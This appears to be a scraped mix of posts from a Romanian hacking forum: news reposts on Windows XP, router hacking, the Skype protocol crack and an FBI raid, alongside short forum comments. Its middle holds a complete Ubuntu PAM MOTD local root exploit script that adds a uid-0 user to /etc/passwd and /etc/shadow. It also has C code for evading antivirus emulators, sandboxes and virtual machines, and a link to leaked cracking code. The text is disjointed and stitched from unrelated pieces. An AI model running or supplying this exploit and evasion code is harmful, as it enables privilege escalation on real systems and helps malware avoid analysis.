begood

Microsoft originally said that new owners of Windows 7 who wanted to downgrade to XP would only have until 2011 to do so, but now the company has changed its mind and extended support for the old operating system until 2020. That's right. Windows XP, an operating system that is already almost 10 years old, will apparently still be relevant for another 10 years. "We have decided to extend downgrade rights to Windows XP Professional beyond the previously planned end date at Windows 7 SP1," wrote Microsoft in an official blog post. "Going forward, businesses can continue to purchase new PCs and utilize end user downgrade rights to Windows XP or Windows Vista until they are ready to use Windows 7." Because users did not seem to be overly outraged about Windows 7 the way everyone was about Vista, it seemed perfectly fine to cut off the remaining life of Windows XP without too much haste. And for the majority of individual computer owners, that probably wouldn't have been a problem. However, what is a problem is that 74% of businesses still use Windows XP, and for a lot of them, the cost of upgrading all of their machines to Windows 7 is not financially tenable. Thus, companies risk having old computers with Windows XP and new computers with Windows 7 which would fragment their network and make it impossible to streamline systems. It is as a result of that statistic that Microsoft will now continue to allow downgrades to Windows XP for people who purchase Windows 7 Professional through 2015, and through 2020 for people who purchase Windows 7 Ultimate, according to a report from Computerworld. However, as of yesterday, Microsoft ended all support for Windows XP SP2, so anyone who still wants to be covered by Microsoft support will at least have to move to XP's Service Pack 3. Windows XP will never die | TG Daily

"Craig Heffner, a researcher with Maryland-based security consultancy Seismic, plans to release a software tool at the Black Hat conference later this month that he says could be used on about half the existing models of home routers, including most Linksys, Dell, and Verizon FiOS or DSL versions. The tool apparently exploits the routers through DNS rebinding. While this technique has been discussed for 15 years or more, Heffner says 'It just hasn't been put together like this before.'" Notebooks.com has a list of routers tested and some advice on securing vulnerable routers. Slashdot IT Story | Millions of Home Routers Are Hackable

LA MAXIM \M/\M/

criptatu pulii...schimbati parolele pentru orice eventualitate.

daca el nu stie decat sa puna paie pe foc, sa-i fie de bine.

daca viitorul e web programing => renunti constient la anonimitate. tu ai face asta ?

Skype is the current leader in VOIP technologies and generates a lot of buzz with each of the developments it makes. Skype holds its VIOP technology as its most prized possession and a hacker has recently managed to crack it! For obvious reasons, Skype is unhappy at the blog, which pointed this out and brought down the post in question. However, it is still available on Google Cache. The author Sean O’Neil writes in his blog saying, For over 10 years, Skype enjoyed selling the world security by obscurity. We must admit, really good obscurity. I mean really really good obscurity. So good that almost no one has been able to reverse engineer it out of the numerous Skype binaries. It is not all security by obscurity of course. There is plenty of good cryptography in Skype. Most of it is implemented properly too. There are seven types of communication encryption in Skype: its servers use AES-256, the supernodes and clients use three types of RC4 encryption – the old TCP RC4, the old UDP RC4 and the new DH-384 based TCP RC4, while the clients also use AES-256 on top of RC4. It all is quite complicated, but we’ve mastered it all. O’Neil wants to say that Skype uses all the security it can to secure its voice data. There are seven encryptions involved in Skype’s protection and it was broken only for educational purpose. The people behind this hack are IT Cryptologists. However, they also admit to the fact that a part of this code was leaked and might be in use by crackers already. Skype is being very secretive about this and is refusing to make any official reply. Clearly, it is a fault on part of the hackers that this code was leaked. Still, Skype should officially assure its users regarding this security issue. Hackers Crack Skype's Proprietary VOIP Protocol | Skype Encryption gets Cracked din cache-ul google : Multiupload.com - upload your files to multiple file hosting sites! pass : rstcenter.com

mie nu-mi convine, e asemanator site-ului lui shocker (shockingsoft) voi considera reclama. si trashed si warned si pa si pusi de la vaca.

# Version: pam-1.1.0 # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)

nu va aminteste de un "hacker" roman din zilele noastre ?

MD5( USCYBERCOM plans, coordinates, integrates, synchronizes and conducts activities to: direct the operations and defense of specified Department of Defense information networks and; prepare to, and when directed, conduct full spectrum military cyberspace operations in order to enable actions in all domains, ensure US/Allied freedom of action in cyberspace and deny the same to our adversaries.) RATATI, e clar ca era imposibil sa spargi un asemenea hash. Asta nu era challenge, era semnatura, sau era pus la bataie de joc, SAU is ei idioti. Ultima mai de graba tind s-o cred.

#!/bin/bash# # Exploit Title: Ubuntu PAM MOTD local root # Date: July 9, 2010 # Author: Anonymous # Software Link: http://packages.ubuntu.com/ # Version: pam-1.1.0 # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx) # CVE: CVE-2010-0832 # Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i # References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen # # Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow. # Does not prompt for login by creating temporary SSH key and authorized_keys entry. # # user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh # [*] Ubuntu PAM MOTD local root # [*] Backuped /home/user/.ssh/authorized_keys # [*] SSH key set up # [*] Backuped /home/user/.cache # [*] spawn ssh # [+] owned: /etc/passwd # [*] spawn ssh # [+] owned: /etc/shadow # [*] Restored /home/user/.cache # [*] Restored /home/user/.ssh/authorized_keys # [*] SSH key removed # [+] Success! Use password toor to get root # Password: # root@ubuntu:/home/user# id # uid=0(root) gid=0(root) groupes=0(root) # P='toor:x:0:0:root:/root:/bin/bash' S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' echo " [*] Ubuntu PAM MOTD local root" [ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1 [ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1 [ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1 backup() { [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak [ -e "$1" ] || return 0 mv "$1"{,.bak} || return 1 echo " [*] Backuped $1" } restore() { [ -e "$1" ] && rm -rf "$1" [ -e "$1".bak ] || return 0 mv "$1"{.bak,} || return 1 echo " [*] Restored $1" } key_create() { backup ~/.ssh/authorized_keys ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1 [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; } mv "$KEY.pub" ~/.ssh/authorized_keys || return 1 echo " [*] SSH key set up" } key_remove() { rm -f "$KEY" restore ~/.ssh/authorized_keys echo " [*] SSH key removed" } own() { [ -e ~/.cache ] && rm -rf ~/.cache ln -s "$1" ~/.cache || return 1 echo " [*] spawn ssh" ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; } echo "[+] owned: $1" } bye() { key_remove exit 1 } KEY="$(mktemp -u)" key_create || { echo "[-] Failed to setup SSH key"; exit 1; } backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; } own /etc/passwd && echo "$P" >> /etc/passwd own /etc/shadow && echo "$S" >> /etc/shadow restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; } key_remove echo "[+] Success! Use password toor to get root" su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \ chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor Ubuntu PAM MOTD Local Root Exploit

FBI agents have raided the homes of three alleged members of a hacker gang that harassed a security expert who helped put the group’s leader in jail, according to a recently unsealed search warrant affidavit. Jesse William McGraw, aka “GhostExodus,” pleaded guilty in May to computer-tampering charges for putting malware on a dozen machines at the Texas hospital where he worked as a security guard. He also installed the remote-access program LogMeIn on the hospital’s Windows-controlled HVAC system. Last month’s raids were prompted by the aftermath of McGraw’s arrest. McGraw was the leader of an anarchistic hacking group called the Elektronic Tribulation Army, and his bust led to a flood of harassment against the Mississippi computer-security researcher who discovered screenshots of the HVAC access online and informed the FBI. “They set up website in my name to pose as me, and put up embarrassing content or things they thought would embarrass me, including a call-to-action to buy sex toys, and fake pornographic images,” says R. Wesley McGrew, 30, of McGrew Security. “They harvested e-mail addresses from the university I work at and e-mailed it out to those.” McGrew (who has no relation to McGraw), also suffered DDoS attacks to his website, and threatening e-mails, phone calls and IMs, according to the FBI. The harassment was “affecting a potential witness in an official proceeding,” the affidavit reads, and thus may violate federal law against witness intimidation. On June 23, the FBI raided the homes of ETA members “Fixer,” “dev//null” and “Xon” in Manteca, California; Hamilton, Ohio; and Pittsburg, Kansas, respectively, as well as the home of McGraw’s sister in Grand Prairie, Texas. The search warrant affidavit was unsealed Friday. McGrew says the harassment stopped after the raids. A notice on the ETA’s website strikes a defiant note. “On the 23rd of June 2010 the Federal Bureau of Investigation issued search warrants on ETA members,” the site reads. “All their computers and electronic devices have been taken for forensic investigation…. We are not terrorists, we are freedom fighters and cyber protesting is not illegal. ” From the search-warrant affidavit (.pdf), McGraw’s connection to the harassment appears thin. But the FBI also claims McGraw tipped off another ETA member that the FBI was on his trail, potentially violating obstruction-of-justice law. On April 17, while McGraw was in jail for the HVAC access, the government gave his attorney a copy of his colleague Fixer’s Gmail and YouTube accounts in pre-trial discovery, revealing that they had Fixer under surveillance. Three days later, McGraw phoned his sister, and in a monitored phone call told her to instruct ETA-member dev//null to post a warning note to the group’s website. “I need you to tell him that [it's] ‘defcon black’ for Fixer,” he said. “ay that Fixer is now ‘defcon black.’… You need to put it where they can see it … where everyone can see it. This is very important. There is nothing more important than this in life right now.” He made similar emphatic calls to his wife and a friend, and then his sister again, remarking, “I was told by my attorney that they want to prosecute [Fixer] and arrest him.” He finally got word from his sister on April 23 that the message had been received, according to the affidavit. “I just talked to your Fixer guy,” his sister said. “He told me to tell you that everything’s been good, don’t worry about it.” “I haven’t seen or heard anything that in my opnion amounts to obstruction of justice for my client,” said John Nicholson, a federal public defender representing McGraw, in a telephone interview Friday. “But that’s not for me to decide, and it’s not for the prosecutor to decide. That’s for the judge to decide.” McGrew, the security researcher, has “gone out of his way to engage these ETA people,” Nicholson added. “He talks about the case on his blog all the time. It’s my understanding that he taught aspects of this case in his class. He communicates voluntarily with members of the ETA.” As GhostExodus, McGraw was a colorful figure who once shot a YouTube video of himself staging an “infiltration” mission at an office building, in which he’s seen skulking through the halls and installing RxBot on a desktop computer. According to court records, ETA was building a modest botnet to attack a rival hacker gang. In another video he displays his personal collection of infiltration gear, including lock picks, a cellphone jammer and fake FBI credentials. Both videos turned out to be shot at the Northern Central Medical Plaza in Dallas, where he worked as a night security guard and had free run of the building. While the videos suggest McGraw was something less than a grave danger to cyberspace, FBI agents took his antics seriously when they learned he’d installed a backdoor in the HVAC unit. A failure of the unit could have affected hospital patients in the middle of a hot Texas summer, or caused drugs and other medical supplies to go bad, according to the bureau. McGraw’s sentencing in the hospital case is set for September 16 in Dallas. Read More FBI Raids ‘Elektronic Tribulation Army’ Over Witness Intimidation | Threat Level | Wired.com

nu stiu cine a bagat +1, io am bagat doar 1336

Emulation Awareness for offensisiveC0ding a kindly provided by Gunther from ARTeam. Author: - E-Mail: - Evilcry's Dark Cave Evilcodecave’s Weblog ******************************************************************** Anti-KAV -> Call this one before WSAStartup(),so sockets wont be initialized. Anti-NOD32 -> sse1 instruction which nod32 cannot emulate. IsEmulator -> Timings Attack to Emulator Environement. IsCWSandBox -> Check if CreateProcess is hooked. IsAnubis -> Check whether it is running within Anubis. IsAnubis2 -> Check whether it is running within Anubis. IsNormanSandBox -> NormanSandBox Awareness. IsSunbeltSandBox -> Sunbelt Awareness. IsVirtualPC -> VirtualPC Awareness. IsVMware -> VMware Awareness. DetectVM -> Check whether it is running in VMWare, VirtualBox using registry. IsRegMonPresent -> Checking for RegMon by checking if the driver is loaded in memory and by searching for the window handle. /* Emulation Awareness for offensisiveC0ding a kindly provided by Gunther from ARTeam. Author: - E-Mail: - http://evilcry.netsons.org http://evilcodecave.wordpress.com ******************************************************************** Anti-KAV -> Call this one before WSAStartup(),so sockets wont be initialized. Anti-NOD32 -> sse1 instruction which nod32 cannot emulate. IsEmulator -> Timings Attack to Emulator Environement. IsCWSandBox -> Check if CreateProcess is hooked. IsAnubis -> Check whether it is running within Anubis. IsAnubis2 -> Check whether it is running within Anubis. IsNormanSandBox -> NormanSandBox Awareness. IsSunbeltSandBox -> Sunbelt Awareness. IsVirtualPC -> VirtualPC Awareness. IsVMware -> VMware Awareness. DetectVM -> Check whether it is running in VMWare, VirtualBox using registry. IsRegMonPresent -> Checking for RegMon by checking if the driver is loaded in memory and by searching for the window handle. */ // Anti-KAV void __forceinline anti_kav(void){ gethostbyname("microsoft.com"); DWORD key = (GetLastError() << 16) + GetLastError();// 276D276D DWORD dat = 0xE4AEE4AE; // 0xc3c3c3c3 (ret,ret,ret,ret) xored with 0x276D276D dat ^= key; __asm push dat __asm call esp } // Anti-NOD32 void __forceinline antiemul(void){ __asm pminsw xmm0,xmm1 } BOOL IsEmulator(void){ DWORD dwFirst , dwSecond; dwFirst= GetTickCount(); Sleep(500); dwSecond= GetTickCount(); if( (dwSecond - dwFirst )<500 ){ return TRUE; }else{ return FALSE; } } BOOL IsCWSandBox(void){ unsigned char cBuffer; unsigned long lProc= (unsigned long)GetProcAddress( GetModuleHandle( "KERNEL32.dll" ), "CreateProcessA" ); if( ReadProcessMemory( GetCurrentProcess(), (void *) lProc, &cBuffer, 1, NULL ) ){ if( cBuffer==0xE9 ){ return TRUE; } } return FALSE; } BOOL IsAnubis(void){ PROCESSENTRY32 pe32; DWORD PID= 0, PPID= 0, expPID= 0; HANDLE hSnapshot; pe32.dwSize= sizeof(PROCESSENTRY32); hSnapshot= CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if( Process32First(hSnapshot, &pe32) ){ while( Process32Next(hSnapshot, &pe32) ){ PID= pe32.th32ProcessID; if( PID==GetCurrentProcessId() ){ PPID= pe32.th32ParentProcessID; } if( !strcmp(pe32.szExeFile, "explorer.exe") ){ expPID= pe32.th32ProcessID; } } CloseHandle(hSnapshot); } if( PPID!=expPID ){ return TRUE; }else{ return FALSE; } } BOOL IsAnubis2(void){ char cFile[MAX_PATH]; BOOL dwRes= FALSE; if( strstr(cFile, "C:\\InsideTm\\") ){ dwRes= TRUE; } return dwRes; } BOOL IsNormanSandBox(void){ char szUserName[MAX_PATH]; DWORD dwUserNameSize= sizeof(szUserName); GetUserName(szUserName, &dwUserNameSize); if( !strcmp(szUserName, "CurrentUser") ){ return TRUE; }else{ return FALSE; } } BOOL IsSunbeltSandBox(void){ char szFileName[MAX_PATH]; GetModuleFileName(NULL, szFileName, MAX_PATH); if( !strcmp(szFileName, "C:\\file.exe") ){ return TRUE; }else{ return FALSE; } } BOOL IsVirtualPC(void){ __try{ __asm{ mov eax, 1 _emit 0x0F _emit 0x3F _emit 0x07 _emit 0x0B _emit 0xC7 _emit 0x45 _emit 0xFC _emit 0xFF _emit 0xFF _emit 0xFF _emit 0xFF } }__except(1){ return FALSE; } return TRUE; } BOOL IsVMware(void){ DWORD _EBX; __try{ __asm{ push ebx mov eax, 0x564D5868 mov ebx, 0x8685D465 mov ecx, 0x0A mov dx, 0x5658 in eax, dx mov _EBX, ebx pop ebx } }__except(1){ return FALSE; } return _EBX == 0x564D5868; } // Check whether it is running in VMWare, VirtualBox using registry. BOOL DetectVM(void){ HKEY hKey; int i; char szBuffer[64]; char *sProduct[] = { "*VMWARE*", "*VBOX*", "*VIRTUAL*" }; unsigned long hSize= sizeof(szBuffer) - 1; if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\Disk\\Enum", 0, KEY_READ, &hKey )==ERROR_SUCCESS ){ if( RegQueryValueEx( hKey, "0", NULL, NULL, (unsigned char *)szBuffer, &hSize )==ERROR_SUCCESS ){ for( i = 0; i < ( sizeof( sProduct ) / sizeof( char* ) ); i++ ){ if( strstr( szBuffer, sProduct[ i ] ) ){ RegCloseKey( hKey ); return TRUE; } } } RegCloseKey( hKey ); } return FLASE; } // Checking for RegMon by checking if the driver is loaded in memory and by searching for the window handle. BOOL IsRegMonPresent(void){ HANDLE hFile; HANDLE hWnd; // Check if the driver is loaded in the memory. hFile = CreateFile("\\\\.\\REGVXD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); if( hFile!=INVALID_HANDLE_VALUE ){ // RegMon found. return 1; } // Search for a window with a title " Registry Monitor ... ". hWnd= FindWindow(NULL, "Registry Monitor - Sysinternals: www.siliconrealms.com"); if( hWnd!=NULL ){ // RegMon found. return 1; } // RegMon not found. return 0; }http://evilcry.netsons.org/OC0/code/EmulationAwareness.c C | /* Emulation Awareness for off - Anonymous - nuhjxgLY - Pastebin.com google search : emulation awareness

slab troll. nici fail nu e.

00-99 = 100 100*41 = 4100 numere posibile cu RST.

si intr-o zi cu ploaie yceman_yceman nu va mai posta pe forum... trista zi..

Krisler12™ uita-te si tu la poll results

ai dreptate, nu ruleaza nici pe xp nici pe win7. ban permanent.

trojan dropper. infectat Virustotal. MD5: 1eb6c81b569bee8c9cb1d35e5862071b Artemis!1EB6C81B569B probably a variant of Win32/TrojanDropper.Agent PWS:Win32/Zbot

cu scopul de a cunoaste lume, de a te face remarcat, de a-ti deschide noi usi datorita prieteniilor legate.

poate va intereseaza pentru model : Tuts 4 You: Downloads / ARTeam eZine

la facultate trebuie sa te implici in cat mai multe proiecte, sa-ti ocupi timpul, sa fi cunoscut